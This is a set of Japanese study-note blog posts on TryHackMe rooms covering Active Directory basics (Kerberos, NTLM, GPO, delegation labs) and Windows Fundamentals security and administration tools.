2. ネットワーク上の名前解決プロトコルを悪用して偽の応答を返し、資格情報（NTLM ハッシュ等）を収集するオープンソースのツール。 ↩︎
3. マルウェアや攻撃の痕跡（IoC：Indicator of Compromise）を検出するためのパターンマッチ用ルール言語。 ↩︎

はじめに

Active Directory Basics の備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

TryHackMe

Active Directory Basics This room will introduce the basic concepts and functionality provided by Active Directory.

Active Directoryの基礎

Active Directoryとは

Active Directory は企業や組織のユーザーやパソコンをまとめて管理するサービス。

何ができるか

住所録の役割
・社員（ユーザー）
・パソコンやサーバー（コンピューター）
・プリンタなどの機器
これらを「誰が」「どこに」「どういう権限で」存在するのか、まとめて記録。

鍵の役割
・社員が会社のパソコンにログインするとき
・社員が社内のファイルサーバーにアクセスするとき
IDとパスワードをチェックし、その人が使えるものだけ使わせるように制御。

Active Directory の主な機能

ユーザー管理：社員アカウントを一元管理
コンピューター管理：PCやサーバーをまとめて管理
認証（ログインチェック）：誰が正しいユーザーか確認
権限付与（アクセス制御）：どこまで操作できるか決定
ポリシー配布（GPO）：全社PCに一括でルール設定（例：パスワードは10文字以上）

Windowsドメインとは

組織全体のPCとユーザーをまとめたグループ。

ドメインコントローラー（DC）

ドメインの中心にいるのが ドメインコントローラー (Domain Controller, DC)。
これは Active Directory が入った Windows サーバーで、以下の役割がある。

誰がログインできるか認証する
ユーザーやPCの情報を記録する
セキュリティポリシーを配布する

ドメインに参加するとどうなるか

会社のPCを「ドメインに参加」させると、
そのPCはドメインコントローラーのルールに従うようになる。

社員がどのPCからログインしても、同じIDとパスワードで入れる
営業部の人だけ営業フォルダを見れる、といった権限管理ができる
パスワードの長さやWindows Updateの設定を一括で適用できる

Active Directory のオブジェクト

Active Directory の世界ではネットワーク上に存在するものはすべて「オブジェクト」 として管理される。

代表的なオブジェクト

ユーザー (User)
社員や管理者など人を表すオブジェクト
ユーザーはセキュリティプリンシパル（認証され、権限を持てるオブジェクト）
ユーザーは2種類に分けられる
People：社員など、人間がログインするためのユーザー
Services：サービス（IIS、MSSQL など）を動かすために使うユーザー

コンピュータ (Computer)
ドメインに参加したPCやサーバーを表すオブジェクト
例：PC01$ のように末尾に「$」が付く
OS自身が使うアカウントで、人間が直接ログインすることは想定されていない

セキュリティグループ (Security Groups)
複数のユーザーやコンピュータをまとめて管理する入れ物
1人ずつ権限を与えるよりグループ単位でアクセス制御する方が効率的

OU（組織単位：Organizational Unit）
部署やチームごとにユーザーやコンピュータをまとめる入れ物
例：「IT部門」「営業部門」など
OUにポリシーを適用すると所属するユーザーやPCに自動で反映される

セキュリティグループ (Security Groups)

アクセス権限をまとめて管理するためのグループ。

代表的なデフォルトセキュリティグループ

GPO（Group Policy Object）とは

Windowsドメイン環境でユーザーやコンピュータに対して一括で設定を配布する仕組み。

何ができるか

セキュリティ系
パスワードポリシー（長さ・複雑さ・有効期限など）
アカウントロックアウトの回数制限
Windows Updateの自動適用

ユーザー環境系
デスクトップの壁紙を会社のロゴに固定
コントロールパネルの使用禁止
特定のアプリケーション起動を制御

コンピュータ設定系
共有フォルダの自動マウント
スクリーンセーバーや自動ロックの設定
ファイアウォールやサービスの動作ルール

GPOの適用対象

GPOは「どこにリンクするか」で適用対象が決まる。

ドメイン全体（例：すべてのユーザーにパスワードポリシーを適用）
OU単位（例：営業部PCだけUSBメモリを禁止）
サブOUも継承（OUにリンクしたら、その下のOUにも適用される）

仕組み

1.管理者が GPMC（Group Policy Management Console） でGPOを作成
2.そのGPOをOUやドメインにリンクする
3.ドメインに参加しているユーザーやPCが定期的にGPOを取得（gpupdate）
4.自動的に設定が適用される

配布される仕組みは SYSVOL 共有フォルダ（ドメインコントローラ上）を通じて行われる。

認証方法

Kerberos認証

Active DirectoryでユーザーがログオンするときWindowsは内部で「Kerberos（ケルベロス）認証」という仕組みを使っている。

Kerberosとは

Kerberosはネットワーク上で「安全に」「何度もパスワードを送らずに」認証を行うためのプロトコル。
Windowsドメインでは標準の認証方式として使われている。

例えば、会社のパソコンで一度ログインした後、ファイルサーバーやプリンタ、社内サイトにアクセスしても再びパスワードを入力する必要がないのはこのKerberosが動いているから。

Kerberosの仕組み

用語

Client（クライアント）：ユーザーが操作するPC
KDC（Key Distribution Center）：認証の中心となる仕組み。ドメインコントローラー（DC）上で動作
Service（サーバー）：ファイル共有やデータベースなどの利用したいリソース
TGT（Ticket Granting Ticket）：サービス用チケットをもらうためのチケット
TGS（Ticket Granting Service Ticket）：実際にサービスへアクセスするためのチケット

仕組み

Step 1：TGT（チケット発行チケット）をもらう

ユーザーはまず「ユーザー名」と「タイムスタンプ（時刻情報）」を自分のパスワードから作られた鍵で暗号化してKDCに送る。これが「TGTをください」というリクエスト。

KDC（ドメインコントローラー）はユーザー情報を確認し、
TGT（Ticket Granting Ticket）
セッションキー（Session Key）
をユーザーに返す。

TGTは「krbtgt」という特別なアカウントのパスワードハッシュで暗号化されており、
ユーザー自身は中身を確認できない。

Step 2：TGS（サービス用チケット）をもらう

次にユーザーが特定のサービス（例えば「ファイル共有サーバー」や「MSSQL」）を使いたいとき、
手に入れたTGTを使ってKDCにリクエスト。

リクエストには以下が含まれる：
ユーザー名とタイムスタンプ（セッションキーで暗号化）
取得済みのTGT
SPN（Service Principal Name：接続したいサービス名）

KDCはそれを受け取り、
TGS（サービスチケット）
サービスセッションキー（Svc Session Key）
を発行して返す。

TGSはそのサービスの「所有者アカウント（Service Owner）」のハッシュで暗号化されており、
サービスだけが中身を復号できる。

Step 3：サービスへのアクセス

最後にユーザーは受け取ったTGSを使ってサービスに接続。
サービスは自分の「Service Owner Hash」でTGSを復号し、ユーザーを認証。

これによりパスワードを再送することなく、安全にサービスを利用可能。

要約

Client

KDCさん、私は Username + Timestamp を自分のパスワード鍵で暗号化して送ります。身分証（TGT）をください！

KDC

確認できました。これは TGT と Session Key です。TGT は krbtgt のハッシュ で暗号化してありますよ。

Client

今度は SPN=MSSQL/SRV に接続したいです。TGT と Session Key を使って TGS をお願いします！

KDC

了解。これは TGS と Service Session Key。TGS はサービス所有者のハッシュで暗号化済みです。

Client

サーバさん、これが TGS とタイムスタンプです。

Service（サーバー）

TGS を私のハッシュで復号…OK！認証成功。どうぞ接続してください。

遊園地に例えてみると

Client

こんにちは！この遊園地に入りたいので、チケットをください。

KDC

いらっしゃいませ。身分証を確認しますね。……はい、問題なし！
こちらがあなたのフリーパス（TGT）です。
これを持っていれば、もう一度身分証を見せる必要はありませんよ。

Client

ジェットコースターに乗りたいんですけど、このTGTで乗れますか？

KDC

ジェットコースター専用のチケット（TGS）が必要です。
あなたのTGTを確認しました、はい、これが TGS（サービスチケット） です！

Client

ジェットコースターのチケットを持ってきました。入ってもいいですか？

Service（サーバー）

TGSを確認しますね……OK！あなたは正規のチケットを持っています。
どうぞ乗車をお楽しみください！

NTLM認証

Windowsで使われる認証プロトコル（認証の仕組み）のひとつで特に古いバージョンのWindowsネットワークやファイル共有（SMB）などで利用されることがある。

NTLMとは

Microsoftが開発したWindows専用の認証プロトコル。
主にWindows NT時代（1990年代）に登場し、Active Directoryが登場する前に使われていた。

今でも以下のような場面ではNTLMが動いていることがある。
ドメイン外のPCが共有フォルダにアクセスする場合
Kerberosが利用できない古いシステムやアプリ
ローカル認証や一部のリモート接続（RDP）など。

仕組み

Step 1：認証要求（Authentication Request）

クライアント（ユーザー）はサーバーに対して「ログインしたい」というリクエストを送る。
この時点では、まだパスワードやハッシュは送られない。

Step 2：サーバーからチャレンジ（Challenge）

サーバーはクライアントに対して、ランダムな値（チャレンジ）を送る。
この値は毎回異なり、使い回し（リプレイ攻撃）を防ぐためのもの。

Step 3：レスポンスの生成と送信（NTLM Response）

クライアントは自分のパスワードから生成したNTLMハッシュ（NTLM Hash）を使って、
サーバーから受け取ったチャレンジを暗号化。

Step 4：サーバー→ドメインコントローラーへ送信

サーバーは受け取ったチャレンジとレスポンスをドメインコントローラー（DC）に転送。
実際のパスワード情報はDCが保持しているため、サーバー自身では判定できない。

Step 5：ドメインコントローラーで検証

DCは保存してあるユーザーのNTLMハッシュを使い同じチャレンジを自分でも暗号化。
生成されたレスポンスがクライアントの送ったものと一致すれば認証成功。

Step 6：認証結果をサーバーに返す

DCは認証結果（成功または失敗）をサーバーに返し、
サーバーはその結果に応じてクライアントのアクセスを許可または拒否。

要約

Client

サーバーさん、ログインしたいです！認証をお願いします！

Server

了解しました。それではこちらのチャレンジ（Challenge）をお渡しします。
この値を正しく処理して返してください。

Client

分かりました。
自分のパスワードから作られたNTLMハッシュを使って、
このチャレンジを暗号化します！

Client

Challenge ＋ NTLM Hash → Responseを作って…

Client

できました！これが私のレスポンス（Response）です！

Server

ありがとうございます。このChallengeとResponseをドメインコントローラー（DC）に確認してもらいますね。

DC

なるほど…。
こちらでも保存しているNTLMハッシュを使って同じチャレンジを暗号化してみましょう。

DC

NTLM Hash + Challenge → 自分でResponseを作って…

DC

お、クライアントのResponseと一致！これは本人ですね。

Server

DCが認証OKだそうです！
クライアントさん、ログインを許可します。ようこそ！

Active Directoryの拡張構造

Active Directory（以下AD）では単一のドメインで始まった環境をツリーやフォレストとして拡張することで、大規模組織にも対応できる。

ドメインとは

ドメインはADの管理単位。
ユーザー、コンピュータ、サーバーなどのオブジェクトをまとめて管理できる。

ツリー（Tree）とは

例えば、企業が海外展開して「UK支社」「US支社」ができた場合、それぞれのITチームが独自に管理したい。
このとき、以下のようなサブドメイン構成にすることで管理を分けられる：

thm.local（ルートドメイン）
├─ uk.thm.local（UK支社）
└─ us.thm.local（US支社）

これを「ツリー構造（Domain Tree）」と呼ぶ。
同じ名前空間（thm.local）を共有しており、各サブドメインが独立して管理可能。

各ドメインには Domain Admins（ドメイン管理者）が存在
全体を統括できるのがEnterprise Admins（エンタープライズ管理者）

つまり：
UK支社の管理者 → UK内のDCを管理
Enterprise Admin → 全支社を統括できる

フォレスト（Forest）とは

フォレストは、異なるドメインツリーをまとめた最上位の構造。
例えば、会社「THM Inc.」が「MHT Inc.」を買収した場合：

🟩 フォレスト（Forest）
　┣ 🌳 ツリー1：THM.local
　┃　┣ 🍃 uk.thm.local
　┃　┗ 🍃 us.thm.local
　┗ 🌳 ツリー2：MHT.local
　　　┣ 🍃 asia.mht.local
　　　┗ 🍃 eu.mht.local

この2つを同じネットワーク内で統合したものが「フォレスト（Forest）」。
フォレスト内では、複数のツリーが異なる名前空間でも共存できる。

トラスト関係（Trust Relationship）とは

フォレストやツリーを構成すると別ドメイン間でリソース共有が必要になる。
このときに必要なのが トラスト（信頼）関係 。

一方向トラスト（One-way Trust）
片方のドメインがもう片方のドメインを「信頼する」関係。
例えば：
THM.local → MHT.local を信頼

双方向トラスト（Two-way Trust）
お互いに信頼する関係です。
例えば：
THM.local → MHT.local を信頼
THM.local ← MHT.local を信頼

これにより両方のドメインのユーザーが互いのリソースにアクセス可能となる。
（フォレストやツリーを構築するとデフォルトで双方向トラストが形成される。）

トラスト関係＝自動アクセスではない。
トラスト関係を結んだからといって自動的に全リソースにアクセスできるわけではない。
トラストは「認証を認める」仕組みであり、実際のアクセス権は別途設定が必要。

実際に動かしてみる

Task3 実演

1.OU（Organizational Units）の作成

THM OU に「Students」を作成。

左ペインで THM OU を探して右クリック。
コンテキストメニューから新規作成(New)→組織単位 (Organizational Unit) を選択。

名前を「Students」と入力して OK。

Task4 実演

1.不要なOUの削除
シナリオ：ある部門が予算削減のために閉鎖された。ルーム Task4 のチャートを確認して、不要な部門を削除する。

1-1.OUは誤って削除されないようにデフォルトで保護がかかっているので、まずはプロパティから保護を解除する。

現状では削除しようとしてもエラーになる。

表示(View)→Advanced Features(高度な機能)

プロパティ(Properties)→オブジェクト(Object)→オブジェクトを誤削除から保護する(Protect object from accidental )deletion のチェックを外す。

1-2.保護が外れたのでOUを削除。

保護が外れているので削除確認画面が表示される。

2.委任
シナリオ：ITサポート担当者の「Phillip」に「Sales」、「Marketing」、「Management」のパスワードリセット権限を付与する。
※今回は「Sales」のみ実演。

2-1. 「制御の委任(Delegate Control)」から「Phillip」にパスワードリセット権限を付与する。

 OUを右クリックして制御の委任(Delegate Control)。

「Add」→「Phillip」と入力して「名前の確認(Check Names)」をクリック→OK→Next

「ユーザーのパスワードをリセットし、次回ログオン時にパスワード変更を強制する(Reset user passwords and force password change at next logon)」にチェックを入れ、Next。

2-2. 「Phillip」でログインし、Sales 部門のユーザー「Sophie」のパスワードリセットを実行する。

まずは、「Phillip」でログイン。

xfreerdp3 /v:IPアドレス /u:'THM¥ユーザー名' /p:'パスワード'

PowerShell からパスワード変更。
※7文字以上、大文字・小文字・数字・記号を混ぜたパスワード推奨。簡単すぎるとエラーになる。

PS C:\Users\phillip> Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

New Password: **********

VERBOSE: Performing the operation "Set-ADAccountPassword" on target "CN=Sophie,OU=Sales,OU=THM,DC=thm,DC=local".

一緒にパスワードの強制リセットも設定。次回ログイン時にパスワード変更が必須になる。

PS C:\Users\phillip> Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose

VERBOSE: Performing the operation "Set" on target "CN=Sophie,OU=Sales,OU=THM,DC=thm,DC=local".

2-3.「Sophie」でログインし、フラグを取得。

まずは、「Sophie」でRDPログイン。

xfreerdp3 /v:IPアドレス /u:'THM¥ユーザー名' /p:'パスワード'

パスワードの強制リセットが反映されている。任意のパスワードを設定し、ログイン。

デスクトップにフラグを発見。

Task5 実演

1.コンピューターの移動
シナリオ：デフォルトでDCを除くすべてのマシンは「Computers」コンテナに配置される。最適なOUを作成し、各マシンを配置しなおす。

1-1.まずは「Workstations」と「Servers」OUを作成。

1-2.次に適切なOUにマシンを移動。

Task6 実演

1.コントロールパネルへのアクセス制限
シナリオ：コントロールパネルへのアクセスをIT部門のユーザーのみに制限したい。

1-1.GPO「Restrict Control Panel Access」を作成。

Group Policy Management → 「Group Policy Objects」を右クリック → New

「Restrict Control Panel Access」→ OK

1-2.「Restrict Control Panel Access」ポリシーを編集。

「Restrict Control Panel Access」を右クリック → Edit

User Configuration → Policies → Administrative Templates → Control Panel に移動。
「Prohibit access to Control Panel and PC settings」 を Enabled（有効） にする。

1-3.「Restrict Control Panel Access」をリンク。

Marketing、Management、Sales に「Restrict Control Panel Access」をドラック＆ドロップ。

2.すべてのマシンに自動ロックを適用する
シナリオ：すべてのマシンに5 分間のアイドルで自動ロックの設定をする。

2-1.GPO「Auto Lock Screen」を作成。

Group Policy Management → 「Group Policy Objects」を右クリック → New → Auto Lock Screen → OK

2-2.「Auto Lock Screen」ポリシーを編集。

Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options → Interactive logon: Machine inactivity limit → 値を 5 分（＝300 秒） に設定し、OK。

2-3.「Auto Lock Screen」をリンク。

thm.local（ルートドメイン）に「Auto Lock Screen」をドラック＆ドロップ。

3.GPOが適用されているか確認。

まずは、「Mark」でRDPログイン。

xfreerdp3 /v:IPアドレス /u:'THM¥ユーザー名' /p:'パスワード'

gpupdate /force でポリシーを即時適用。

コントロールパネルを開こうとするとエラーになる。

後は、5分放置して画面が自動ロックになるか確認して終了。

つまづいたこと

グループとOUの違い

グループもOUも同じもののように見えた。
例えば、営業部のAさんがいたとして
グループ：営業
OU：営業
権限：営業
となると、OUとグループの役割が重複しているのでは？と思った。
ChatGPTに聞いてみた結果

• Aさんのアカウント → OU「営業」に所属
  • → 営業部用のポリシー（例：USB禁止、壁紙設定など）が自動適用
• Aさんのアカウント → グループ「営業」にも所属
  • → 営業フォルダのアクセス権限を持つ

👉 つまり「OUとグループは別の役割を持っていて、重複して使うものではない」んです。

とのこと。自身で調べてみても間違ってはいなさそう。
ざっくり
OU = GPOを適用
グループ = フォルダアクセス権を適用　の違いがあることは覚えた。

はじめに

Windows Fundamentals 3 の備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

TryHackMe

Windows Fundamentals 3 In part 3 of the Windows Fundamentals module, learn about the built-in Microsoft tools that help keep the device secure, such as Windows Updates, Windows Securi…

Windows Fundamentals 3

Windows Security

旧名称：Windows Defender Security Center
Windowsに最初から入っているセキュリティ機能を一元管理するツール。
ウイルス対策やファイアウォール、デバイス保護などをまとめて確認・設定できる。

主な機能

Virus & threat protection (ウイルスと脅威の防止 )
Windows Defender Antivirus（標準のウイルス対策ソフト）の状態を管理。
スキャン、ウイルス定義の更新、検出ログ確認など。

Firewall & network protection (ファイアウォールとネットワーク保護)
Windows Defender Firewall の管理。
ネットワークごと（ドメイン/プライベート/パブリック）に制御できる。

App & browser control(アプリとブラウザの制御 )
Microsoft Defender SmartScreen の設定。
危険なアプリやフィッシングサイトのブロック。

Device security (デバイスセキュリティ)
ハードウェアレベルの保護（TPM、セキュアブート、仮想化ベースのセキュリティなど）。

マークの意味

Windowsセキュリティの各項目には、状態を示すマークが表示される。

✅ 緑色（チェックマーク）
→ 「問題なし」の状態。正常に動作していて、特に操作は不要。
例：ファイアウォールが有効、アプリ制御がオンになっている場合。

⚠️ 黄色（警告アイコン/感嘆符）
→ 「注意が必要」な状態。
設定が推奨されるが、セキュリティ上、致命的ではない場合に表示。
例：ウイルススキャンがしばらく実行されていない。

❌ 赤色（×マーク）
→ 「危険」や「対処が必要」な状態。
セキュリティ保護が無効になっていたり、脅威が検出された場合に表示。
例：ウイルス対策が無効、マルウェアが検出された。

Windows Security の画面
※Windows Server 2019エディション

Virus & threat protection（ウイルスと脅威からの保護）

Windowsに標準搭載されているウイルス対策機能。
マルウェア（ウイルス、ワーム、トロイの木馬、ランサムウェアなど）からPCを守る。
定期的なスキャンやリアルタイム保護を行い、脅威が見つかると通知してくれる。
サードパーティ製のアンチウイルスソフト（例：Norton、McAfeeなど）を入れると、この項目がそのソフトに切り替わることもある。

主な機能

Current threats（現在の脅威）
PC上に現在存在する脅威を確認する機能。

主な項目
現在の脅威一覧：検出されたマルウェアがあればここに表示される。
スキャン結果：最後にスキャンした日時、スキャンの種類（クイック/フル/カスタム）、検出数、処理結果。
スキャンオプション：
　-クイックスキャン：感染しやすい場所だけ短時間でチェック。
　-フルスキャン：全ファイルやプログラムを調査。時間がかかる。
　-カスタムスキャン：ユーザーが指定したフォルダやドライブを確認。
Threat history（脅威の歴史）：
Last scan（最後のスキャン）
最後に実行したスキャン日時や結果が記録される。
Quarantined threats（隔離された脅威）
検出されたウイルスやマルウェアを「隔離領域」に移動して、PC上で実行されないようにしたもの。
ユーザーはここから削除したり、誤検知であれば「復元」することも可能。
Allowed threats（許可した脅威）
本来は脅威として検出されたが、ユーザーが「安全だ」と判断して実行を許可した項目。
注意：セキュリティ的にはリスクが高いため、100%安全だと確信がある場合のみ許可するべき。

Virus & threat protection settings（ウイルスと脅威の防止設定）
マルウェア対策の細かい挙動を設定できる場所。

主な項目
Real-time protection（リアルタイム保護）：常に動作している監視。オフにすると危険。
Cloud-delivered protection（クラウド提供の保護）：最新の脅威情報をクラウドから取得し、より早く防御。
Automatic sample submission（自動サンプル送信）：怪しいファイルをMicrosoftに送って解析。
Controlled Folder Access（制御されたフォルダアクセス）：特定のフォルダ（例：ドキュメント、ピクチャ、デスクトップなど）を保護領域に指定する機能。
Exclusions（除外設定）：特定のフォルダやファイルをスキャン対象外にする（誤検知対策）。
Notifications（通知）：検出や問題があればユーザーに知らせる。

注意
リアルタイム保護やクラウド保護を切ると感染リスクが大幅に上がる。

Virus & threat protection updates（ウイルスと脅威からの保護の更新）
セキュリティ定義ファイル（ウイルス定義データベース）を最新に保つ。

主な項目
Check for updates（更新確認）ボタンで手動更新可能。
通常は自動更新されるため、最新のウイルスにも対応できる。

ポイント
古い定義のままだと新種のウイルスを検知できないので、更新の有無は非常に重要。

Ransomware protection（ランサムウェア対策）
ランサムウェアによる「ファイル暗号化」からデータを守る。

主な項目
Controlled folder access（制御されたフォルダアクセス）
特定フォルダ（例：ドキュメント、ピクチャ）を守り、未知のアプリが勝手に変更できないようにする。この機能を使うにはリアルタイム保護を有効にしなければいけない。

Firewall & network protection（ファイアウォールとネットワーク保護）

Windowsに標準搭載されているネットワーク保護機能。
ドメイン・プライベート・パブリックといったネットワークごとに通信ルールを制御し、
外部からの不正アクセスや不要なアプリの通信をブロックできる。

主な機能

プロファイル

Domain network
ドメイン参加時に使う社内向けプロファイル。企業ポリシーで管理されることが多い。

Private network（active）
家庭/社内の信頼できるネットワーク。共有や発見を許可する設定が選べる。

Public network
公共Wi-Fi等の不特定多数が利用する環境。最も厳格（受信接続は原則ブロック）。

追加オプション

（Allow an app through firewallアプリをファイアウォール経由で許可する）
特定のアプリやサービスについて、ファイアウォールのブロックを解除し通信を許可する設定。
例えば、ゲームやリモートデスクトップ、開発用のWebサーバーなどを動かすときに必要。

Network and Internet troubleshooter（ネットワークとインターネットのトラブルシューティング）
ネットワーク接続の問題（Wi-Fiにつながらない、通信が不安定など）を自動診断・修復するツール。
ファイアウォール設定が原因で通信できない場合にも役立つ。

Firewall notification settings（ファイアウォール通知の設定）
新しいアプリが通信をしようとしたときに、通知を表示するかどうかを設定できる。
通常はオンにしておくのがおすすめ。安全でないアプリの通信を防ぐ手がかりになる。

Advanced settings（詳細設定）
Windows Defender Firewall with Advanced Security の画面を開く。
送信ルールや受信ルールを細かく設定可能。ポート番号・プロトコル・アプリ単位で制御できる。
企業ネットワークやサーバー管理で使われることが多い。

Restore firewalls to default（ファイアウォールを既定に戻す）
ファイアウォールの設定をすべてリセットして、初期状態に戻す。
設定を間違えて通信できなくなった場合などのトラブル解決に有効。

App & browser control（アプリとブラウザのコントロール）

主に Microsoft Defender SmartScreen という仕組みを利用して、危険なWebサイトやアプリからPCを保護する。
信頼できないファイルや不審なWebコンテンツを検出し、ユーザーに警告を出す。

主な機能

Check apps and files（アプリとファイルの確認）
Windows Defender SmartScreen が、インターネットや外部から入ってくる未知または信頼されていないアプリ・ファイルをチェックして、危険なものの実行を防ぐ。

Block（ブロック）
不審なアプリやファイルを検出した場合、実行自体をブロックする。安全性が高い設定。
Warn（警告）
実行前に警告を表示。ユーザーが「続行」を選べば実行できる。利便性と安全性のバランス。
Off（無効）
チェックを行わない。セキュリティ的にリスクが高いため推奨されない。

Exploit protection（エクスプロイト防止）
Windows10以降に標準搭載されている、脆弱性を悪用した攻撃（エクスプロイト）からPCを守る仕組み。
メモリ破壊系の攻撃や不正コード実行など、一般的なエクスプロイト手法を困難にする。

Device security（デバイスセキュリティ）

ハードウェアレベルの保護機能（TPM、Secure Boot、仮想化ベースのセキュリティなど）の状態を表示。
この設定を変更することは稀。

BitLocker（ディスク暗号化機能）

正式名称：BitLocker Drive Encryption
目的：PCのハードディスクやSSD全体を暗号化して、不正アクセスからデータを保護する。
仕組み：AES（Advanced Encryption Standard）という強力な暗号化方式を使い、ディスク上のデータを「読み取り不可能な状態」にする。

特徴

PCを盗まれても安心
HDDやSSDを取り外して別のPCにつないでも、中身は暗号化されているため読み取れない。

OSごと暗号化
ディスク全体を暗号化するため、ファイル単位ではなく「PCそのもののセキュリティ」を高められる。

TPMチップ連携
Trusted Platform Module（TPM：信頼できるプラットフォームモジュール）¹と連携し、起動時にハードウェアの改ざんを検出できる。

回復キー
パスワードを忘れた場合やPCに大きな変更があった場合は、セットアップ時に生成される「回復キー」で復旧可能。

1. パソコンに搭載されているセキュリティ専用チップのこと。暗号鍵や証明書などの重要情報を安全に保存するための領域を持つ。PCの金庫役。 ↩︎

Volume Shadow Copy Service / VSS（ボリューム・シャドウ・コピー・サービス）

ファイルやシステムを使用中（稼働中）の状態でも、一時的なスナップショット（シャドウコピー） を作成できる。
そのスナップショットを利用して、バックアップや復元を行うことが可能。
例えば、システムの「復元ポイント」や、バックアップソフトが動作中に使っている。

主な役割

ファイルを開いたままでもバックアップ可能
→ 通常は編集中のファイルをコピーできないが、VSSがスナップショットを作ることで可能になる。

システム復元に利用
→ Windowsの「復元ポイント」もVSSによって管理されている。

アプリやサービスと連携
→ SQL Server や Exchange などのデータベースも VSS を利用して一貫性のあるバックアップを実現できる。

セキュリティや注意点

ランサムウェア攻撃では、復元できなくするためにこのVSSのスナップショットが削除されることが多い。
そのため、VSSは便利だが完全なバックアップ手段ではなく、外部媒体へのバックアップも重要。

Living Off The Land / LotL（環境寄生型攻撃）

攻撃者がOSや標準ツール（既に存在する正当なバイナリ/機能）を悪用してマルウェアを配布・持続化・横展開・情報窃取などを行う手法。
これまでに紹介したWindowsの標準機能も、LotL攻撃で悪用されることがある。

具体例

PowerShellを使ってDefenderの設定を無効化する。
netshコマンドを使ってFirewallルールを改変する。
VSSを削除してバックアップを無効化する。
BitLockerを悪用して強制暗号化し、利用者がデータにアクセスできなくする。
など

はじめに

Windows Fundamentals 2 の備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

TryHackMe

Windows Fundamentals 2 In part 2 of the Windows Fundamentals module, discover more about System Configuration, UAC Settings, Resource Monitoring, the Windows Registry and more..

Windows Fundamentals 2

Windows Fundamentals 2 についてのメモ

Windowsのトラブルシューティングの基礎知識。
以後、Windowsで問題が発生した際はここで概要を確認。

システム構成

システム構成ユーティリティ（msconfig.exe）

「システム構成ユーティリティ（MSConfig）」はWindowsに標準搭載されているシステム管理ツールの一つで、スタートアップやブート動作の調整に使える。

概要

実行ファイル名： msconfig.exe
場所： %systemroot%\system32\msconfig.exe
目的：Windowsの起動設定やサービス、スタートアッププログラムの管理を行い、トラブルシューティングやパフォーマンス改善に利用する。

主な機能

全般 (General)
Windowsの起動方法を切り替える基本設定タブ。

通常スタートアップ
すべてのドライバ・サービスを読み込む（通常運用）。

診断スタートアップ
Windows を最小限のドライバとサービスで起動（セーフモードに近い）。トラブル原因切り分けに使う。

選択スタートアップ
読み込むサービスやスタートアップ項目をユーザーが選択可能。

ブート (Boot)
起動オプションを指定できる。

Safe Boot（セーフブート）
最小限のサービスだけで起動。ネットワーク付きセーフモードも選べる。

No GUI boot（GUIなしブート）
Windowsロゴや進捗バーを表示せずに黒画面で起動する。

Boot log（ブートログ出力）
起動時にロードされたドライバを C:\Windows\ntbtlog.txt に記録する。ドライバの不具合調査に使う。

Base video（基本VGAドライバで起動）
標準VGAドライバで起動する。グラフィックドライバの問題切り分けに使う。

OS boot information（OSブート情報表示）
起動時にロードされるドライバ名を逐次画面に表示する。どのドライバで停止しているか調査できる。

サービス (Services)
Windowsサービスの一覧を表示。
不要なサービスを一時的に停止して、問題切り分けに利用可能。
※常駐セキュリティソフト等を止めると危険なので注意。

スタートアップ (Startup)
現在はタスクマネージャー（taskmgr）のスタートアップタブに移管されたため利用することはほとんどない。

ツール (Tools)

各種管理ツール（イベントビューア、コマンドプロンプト、レジストリエディタなど）へのショートカット。
管理者向けの便利メニュー。

コンピュータ管理

コンピュータの管理 (compmgmt.msc)

Windowsに標準で搭載されている 統合管理コンソール（MMCスナップインの1つ）。システムのさまざまな管理ツールを一つの画面から利用できる。

概要

実行ファイル名： compmgmt.msc
場所： %systemroot%\system32\compmgmt.msc
目的：システム管理ツールを統合的に利用できる管理コンソール。ユーザーやグループ管理、イベントログ確認、ディスク管理、サービスの制御などを一元的に行う。

主な機能

システムツール (System Tools)
PCの基本的な管理に関するツール群。

タスクスケジューラ
定期的なタスク（バックアップ、更新処理など）を自動実行する設定。

イベントビューア
システムログ・アプリケーションログを確認し、エラーや警告を調査できる。

共有フォルダ
共有設定されているフォルダや接続中のユーザーを確認。

ローカルユーザーとグループ (lusrmgr.msc)
ユーザーアカウントやグループの作成・管理。

パフォーマンス (Performance)
CPU・メモリ・ディスク・ネットワークなどのリソース利用状況をリアルタイムまたはログから監視できる。
詳細な解析やボトルネック調査、リソースモニターの起動も可能。

デバイスマネージャー (Device Manager)
ハードウェアやドライバーの管理。

記憶域 (Storage)
ハードディスクやパーティション、バックアップの管理を行う機能。
ディスクの初期化・フォーマット・容量の調整、システムのバックアップや復元など、記憶装置に関する操作をまとめて管理できる。

ディスクの管理 (Disk Management)
パーティション作成、フォーマット、ボリューム拡張などを行う。

Windows Server バックアップ (Windows Server Backup)
サーバーのバックアップや復元を管理。

サービスとアプリケーション (Services and Applications)
Windows が提供するサービスや追加アプリケーションの管理を行う機能。
サービスの開始・停止・自動起動の設定などを制御でき、システムの安定運用やトラブルシューティングに役立つ。

サービス (Services)
Windowsやアプリケーションのサービスを一覧し、開始・停止・再起動を制御。プロパティの表示なども可能。

WMIコントロール (WMI Control)
Windows Management Instrumentation の設定やセキュリティ構成を管理。

Routing and Remote Access (ルーティングとリモートアクセス)
ルーティング機能とリモートアクセス機能を提供。

システム情報

システム情報 (msinfo32.exe)

システム情報ツールは、Windowsに標準搭載されている診断ユーティリティ。
PCのハードウェア構成・システム環境・ドライバー情報を一覧表示できる。

概要

実行ファイル名：msinfo32.exe
場所：%systemroot%\system32\msinfo32.exe
目的：Windowsのハードウェア構成、システム環境、コンポーネント、ドライバーやサービスなどの詳細情報を一覧表示する。トラブルシューティングやシステム診断、サポートへの情報提供に利用する。

主な機能

・システムの概要表示 (System Summary)
OSのバージョン、ビルド番号、シリアル番号、BIOSバージョン、起動モード（UEFI / Legacy）など。

・ハードウェア情報 (Hardware Resources)
CPU、メモリ、マザーボード、BIOS、ストレージ構成など。

・コンポーネント (Components)
ディスプレイ、サウンド、ネットワークアダプタなどの詳細情報。

・ソフトウェア環境 (Software Environment)
実行中のタスク、サービス、ドライバー、環境変数など。

リソースモニター

リソースモニター (resmon.exe)

リソースモニターは、Windowsに標準搭載されているリソース監視ユーティリティ。
CPU、メモリ、ディスク、ネットワークの使用状況をリアルタイムで確認でき、パフォーマンス問題の解析や不正プロセスの調査に役立つ。

概要

実行ファイル名：resmon.exe
場所：%systemroot%\System32\resmon.exe
